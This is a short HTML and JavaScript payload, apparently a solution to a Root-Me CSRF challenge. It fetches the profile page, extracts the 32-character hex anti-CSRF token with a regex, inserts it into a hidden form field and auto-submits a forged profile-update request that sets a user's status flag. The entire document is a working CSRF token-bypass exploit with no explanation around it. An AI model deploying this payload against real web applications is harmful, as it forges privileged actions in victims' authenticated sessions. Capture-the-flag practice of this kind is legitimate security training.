<form action="http://challenge01.root-me.org/web-client/ch23/?action=profile" method="post" name="csrf_form" enctype="multipart/form-data">
  <input id="username" type="text" name="username" value="ahmed">
  <input id="status" type="checkbox" name="status" checked >
  <input id="token" type="hidden" name="token" value="" />
  <button type="submit">Submit</button>
</form>
<script>
  xhttp = new XMLHttpRequest();
  xhttp.open("GET", "http://challenge01.root-me.org/web-client/ch23/?action=profile", false);
  xhttp.send();
  // extract the token
  token_admin = (xhttp.responseText.match(/[abcdef0123456789]{32}/));
  // insert the token into our form
  document.getElementById('token').setAttribute('value', token_admin)
  // submit the form
  document.csrf_form.submit();
</script>